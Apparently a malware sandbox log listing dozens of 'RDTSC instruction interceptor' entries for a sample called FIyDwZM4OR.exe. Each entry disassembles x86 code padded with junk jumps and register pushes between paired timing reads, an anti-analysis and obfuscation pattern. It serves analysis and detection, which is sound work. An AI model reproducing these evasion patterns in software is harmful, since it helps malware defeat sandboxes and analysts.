Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714091A second address: 714099D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEA75199F6Eh 0x00000009 jmp 00007FEA75199F75h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [ebx+20h] 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FEA75199F6Ch 0x0000001c sub esi, 7CCCB2F8h 0x00000022 jmp 00007FEA75199F6Bh 0x00000027 popfd 0x00000028 mov ch, B0h 0x0000002a popad 0x0000002b mov dword ptr [esi+40h], eax 0x0000002e jmp 00007FEA75199F6Bh 0x00000033 lea eax, dword ptr [ebx+00000080h] 0x00000039 jmp 00007FEA75199F76h 0x0000003e push 00000001h 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714099D second address: 71409A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71409A1 second address: 71409A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71409A5 second address: 71409AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71409AB second address: 71409DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEA75199F77h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71409DD second address: 71409E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71409E3 second address: 71409E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71409E7 second address: 7140AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edi, eax 0x0000000c pushfd 0x0000000d jmp 00007FEA75194B58h 0x00000012 sbb eax, 0511B3A8h 0x00000018 jmp 00007FEA75194B4Bh 0x0000001d popfd 0x0000001e popad 0x0000001f nop 0x00000020 pushad 0x00000021 jmp 00007FEA75194B54h 0x00000026 pushfd 0x00000027 jmp 00007FEA75194B52h 0x0000002c and eax, 345D2138h 0x00000032 jmp 00007FEA75194B4Bh 0x00000037 popfd 0x00000038 popad 0x00000039 lea eax, dword ptr [ebp-10h] 0x0000003c pushad 0x0000003d push eax 0x0000003e mov ah, dl 0x00000040 pop esi 0x00000041 pushfd 0x00000042 jmp 00007FEA75194B4Dh 0x00000047 adc eax, 760E57D6h 0x0000004d jmp 00007FEA75194B51h 0x00000052 popfd 0x00000053 popad 0x00000054 nop 0x00000055 jmp 00007FEA75194B4Eh 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FEA75194B4Eh 0x00000062 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140AF5 second address: 7140B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F6Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140B07 second address: 7140BD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b jmp 00007FEA75194B4Dh 0x00000010 pushfd 0x00000011 jmp 00007FEA75194B50h 0x00000016 or ax, 4F78h 0x0000001b jmp 00007FEA75194B4Bh 0x00000020 popfd 0x00000021 popad 0x00000022 test edi, edi 0x00000024 pushad 0x00000025 call 00007FEA75194B54h 0x0000002a jmp 00007FEA75194B52h 0x0000002f pop esi 0x00000030 pushfd 0x00000031 jmp 00007FEA75194B4Bh 0x00000036 xor esi, 08282C9Eh 0x0000003c jmp 00007FEA75194B59h 0x00000041 popfd 0x00000042 popad 0x00000043 js 00007FEAE2E53670h 0x00000049 pushad 0x0000004a mov bx, cx 0x0000004d movzx eax, bx 0x00000050 popad 0x00000051 mov eax, dword ptr [ebp-0Ch] 0x00000054 pushad 0x00000055 mov edx, 2E839C44h 0x0000005a mov bl, 38h 0x0000005c popad 0x0000005d mov dword ptr [esi+04h], eax 0x00000060 pushad 0x00000061 mov ebx, ecx 0x00000063 push eax 0x00000064 push edx 0x00000065 pushfd 0x00000066 jmp 00007FEA75194B4Ch 0x0000006b adc al, FFFFFFF8h 0x0000006e jmp 00007FEA75194B4Bh 0x00000073 popfd 0x00000074 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140BD7 second address: 7140C93 instructions: 0x00000000 rdtsc 0x00000002 call 00007FEA75199F78h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b lea eax, dword ptr [ebx+78h] 0x0000000e jmp 00007FEA75199F71h 0x00000013 push 00000001h 0x00000015 jmp 00007FEA75199F6Eh 0x0000001a nop 0x0000001b jmp 00007FEA75199F70h 0x00000020 push eax 0x00000021 jmp 00007FEA75199F6Bh 0x00000026 nop 0x00000027 pushad 0x00000028 pushad 0x00000029 mov ecx, ebx 0x0000002b push ebx 0x0000002c pop ecx 0x0000002d popad 0x0000002e popad 0x0000002f lea eax, dword ptr [ebp-08h] 0x00000032 pushad 0x00000033 call 00007FEA75199F75h 0x00000038 pushad 0x00000039 popad 0x0000003a pop ecx 0x0000003b mov bx, AB42h 0x0000003f popad 0x00000040 push ecx 0x00000041 jmp 00007FEA75199F76h 0x00000046 mov dword ptr [esp], eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FEA75199F77h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140CBB second address: 7140CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75194B4Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140CCD second address: 7140D32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a jmp 00007FEA75199F77h 0x0000000f test edi, edi 0x00000011 pushad 0x00000012 mov edi, esi 0x00000014 movzx esi, bx 0x00000017 popad 0x00000018 js 00007FEAE2E58928h 0x0000001e jmp 00007FEA75199F73h 0x00000023 mov eax, dword ptr [ebp-04h] 0x00000026 jmp 00007FEA75199F76h 0x0000002b mov dword ptr [esi+08h], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140D32 second address: 7140D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140D36 second address: 7140D3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140D3A second address: 7140D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140D40 second address: 7140D83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA75199F72h 0x00000008 mov dx, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e lea eax, dword ptr [ebx+70h] 0x00000011 jmp 00007FEA75199F6Ch 0x00000016 push 00000001h 0x00000018 pushad 0x00000019 mov dx, si 0x0000001c mov si, CB19h 0x00000020 popad 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FEA75199F6Bh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140D83 second address: 7140D89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140D89 second address: 7140E0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FEA75199F6Ch 0x0000000f pushfd 0x00000010 jmp 00007FEA75199F72h 0x00000015 adc ah, 00000008h 0x00000018 jmp 00007FEA75199F6Bh 0x0000001d popfd 0x0000001e popad 0x0000001f nop 0x00000020 jmp 00007FEA75199F76h 0x00000025 lea eax, dword ptr [ebp-18h] 0x00000028 jmp 00007FEA75199F70h 0x0000002d nop 0x0000002e jmp 00007FEA75199F70h 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov cx, 9DE3h 0x0000003b mov si, 353Fh 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140E0A second address: 7140E6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA75194B4Bh 0x00000008 call 00007FEA75194B58h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov esi, 39025EE9h 0x0000001a pushfd 0x0000001b jmp 00007FEA75194B56h 0x00000020 jmp 00007FEA75194B55h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140E6B second address: 7140E7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F6Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140E8F second address: 7140E95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140E95 second address: 7140F34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b pushad 0x0000000c mov dl, al 0x0000000e movsx ebx, cx 0x00000011 popad 0x00000012 test edi, edi 0x00000014 pushad 0x00000015 call 00007FEA75199F76h 0x0000001a mov esi, 55D25631h 0x0000001f pop ecx 0x00000020 pushfd 0x00000021 jmp 00007FEA75199F77h 0x00000026 xor ax, 6D9Eh 0x0000002b jmp 00007FEA75199F79h 0x00000030 popfd 0x00000031 popad 0x00000032 js 00007FEAE2E58711h 0x00000038 jmp 00007FEA75199F6Eh 0x0000003d mov eax, dword ptr [ebp-14h] 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FEA75199F77h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140F34 second address: 7140FEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c call 00007FEA75194B4Ch 0x00000011 mov bx, cx 0x00000014 pop eax 0x00000015 movsx edx, cx 0x00000018 popad 0x00000019 mov dword ptr [esi+0Ch], eax 0x0000001c jmp 00007FEA75194B56h 0x00000021 mov edx, 74E806ECh 0x00000026 jmp 00007FEA75194B50h 0x0000002b sub eax, eax 0x0000002d jmp 00007FEA75194B51h 0x00000032 lock cmpxchg dword ptr [edx], ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jmp 00007FEA75194B53h 0x0000003e pushfd 0x0000003f jmp 00007FEA75194B58h 0x00000044 sbb esi, 380BD2A8h 0x0000004a jmp 00007FEA75194B4Bh 0x0000004f popfd 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7140FEF second address: 7141007 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75199F74h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141007 second address: 714100B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714100B second address: 7141073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a mov esi, edi 0x0000000c push ebx 0x0000000d call 00007FEA75199F74h 0x00000012 pop esi 0x00000013 pop edi 0x00000014 popad 0x00000015 test eax, eax 0x00000017 jmp 00007FEA75199F6Eh 0x0000001c jne 00007FEAE2E58603h 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FEA75199F6Eh 0x00000029 adc eax, 07CBB9C8h 0x0000002f jmp 00007FEA75199F6Bh 0x00000034 popfd 0x00000035 mov ch, 53h 0x00000037 popad 0x00000038 mov edx, dword ptr [ebp+08h] 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141073 second address: 7141077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141077 second address: 714107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714107D second address: 7141085 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141085 second address: 71410CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esi] 0x00000009 pushad 0x0000000a mov cx, 5D1Fh 0x0000000e popad 0x0000000f mov dword ptr [edx], eax 0x00000011 pushad 0x00000012 mov bh, EDh 0x00000014 popad 0x00000015 mov eax, dword ptr [esi+04h] 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FEA75199F70h 0x0000001f sub cl, FFFFFFB8h 0x00000022 jmp 00007FEA75199F6Bh 0x00000027 popfd 0x00000028 mov cx, 7DEFh 0x0000002c popad 0x0000002d mov dword ptr [edx+04h], eax 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push ecx 0x00000034 pop edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71410CB second address: 71410E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esi+08h] 0x0000000a jmp 00007FEA75194B4Bh 0x0000000f mov dword ptr [edx+08h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71410E9 second address: 71410ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71410ED second address: 7141108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141108 second address: 714110D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714110D second address: 714114A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 5B8EA5A8h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esi+0Ch] 0x0000000f jmp 00007FEA75194B57h 0x00000014 mov dword ptr [edx+0Ch], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FEA75194B50h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714114A second address: 7141159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141159 second address: 7141171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA75194B54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141171 second address: 71411C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+10h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dx, A486h 0x00000015 pushfd 0x00000016 jmp 00007FEA75199F77h 0x0000001b sub cx, 7B0Eh 0x00000020 jmp 00007FEA75199F79h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71411C4 second address: 71411CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71411CA second address: 71411CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71412B0 second address: 71412B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71412B6 second address: 71412BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71412BA second address: 71412DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+1Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71412DC second address: 71412F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71412F7 second address: 714131A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714131A second address: 7141360 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 call 00007FEA75199F6Eh 0x0000000d pop esi 0x0000000e pop edi 0x0000000f popad 0x00000010 mov eax, dword ptr [esi+20h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FEA75199F6Ch 0x0000001a sub cl, 00000048h 0x0000001d jmp 00007FEA75199F6Bh 0x00000022 popfd 0x00000023 mov ax, 38BFh 0x00000027 popad 0x00000028 mov dword ptr [edx+20h], eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141360 second address: 7141364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141364 second address: 71413AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FEA75199F74h 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [esi+24h] 0x00000013 jmp 00007FEA75199F70h 0x00000018 mov dword ptr [edx+24h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e call 00007FEA75199F6Dh 0x00000023 pop ecx 0x00000024 mov bh, 30h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71413AD second address: 71413DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B53h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+28h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEA75194B55h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71413DE second address: 714143E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEA75199F77h 0x00000009 or cl, 0000000Eh 0x0000000c jmp 00007FEA75199F79h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [edx+28h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d call 00007FEA75199F79h 0x00000022 pop esi 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714143E second address: 71414B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c jmp 00007FEA75194B50h 0x00000011 mov dword ptr [edx+2Ch], ecx 0x00000014 pushad 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FEA75194B4Ch 0x0000001c sbb ax, DC48h 0x00000021 jmp 00007FEA75194B4Bh 0x00000026 popfd 0x00000027 mov bx, si 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d pushfd 0x0000002e jmp 00007FEA75194B52h 0x00000033 jmp 00007FEA75194B55h 0x00000038 popfd 0x00000039 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71414B3 second address: 714150A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ax, word ptr [esi+30h] 0x00000009 jmp 00007FEA75199F6Dh 0x0000000e mov word ptr [edx+30h], ax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FEA75199F73h 0x0000001b adc eax, 7F50514Eh 0x00000021 jmp 00007FEA75199F79h 0x00000026 popfd 0x00000027 mov ecx, 64AA3157h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714150A second address: 7141532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 call 00007FEA75194B4Fh 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ax, word ptr [esi+32h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ecx, 046B2737h 0x0000001b mov al, FFh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 7141532 second address: 71415ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d pushad 0x0000000e push ecx 0x0000000f mov ebx, 429DAD70h 0x00000014 pop edx 0x00000015 pushfd 0x00000016 jmp 00007FEA75199F76h 0x0000001b jmp 00007FEA75199F75h 0x00000020 popfd 0x00000021 popad 0x00000022 mov eax, dword ptr [esi+34h] 0x00000025 pushad 0x00000026 mov dx, si 0x00000029 pushfd 0x0000002a jmp 00007FEA75199F78h 0x0000002f sub eax, 59ED2F48h 0x00000035 jmp 00007FEA75199F6Bh 0x0000003a popfd 0x0000003b popad 0x0000003c mov dword ptr [edx+34h], eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007FEA75199F6Bh 0x00000048 add si, 918Eh 0x0000004d jmp 00007FEA75199F79h 0x00000052 popfd 0x00000053 mov ebx, esi 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 71415ED second address: 714160F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75194B4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edx, 4BE9EF9Eh 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714160F second address: 714166A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA75199F72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FEAE2E58058h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FEA75199F6Eh 0x00000016 adc eax, 147B5998h 0x0000001c jmp 00007FEA75199F6Bh 0x00000021 popfd 0x00000022 mov esi, 0E66C34Fh 0x00000027 popad 0x00000028 or dword ptr [edx+38h], FFFFFFFFh 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FEA75199F71h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714166A second address: 714168B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 movzx ecx, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c or dword ptr [edx+3Ch], FFFFFFFFh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEA75194B4Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714168B second address: 714168F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FIyDwZM4OR.exeRDTSC instruction interceptor: First address: 714168F second address: 7141695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
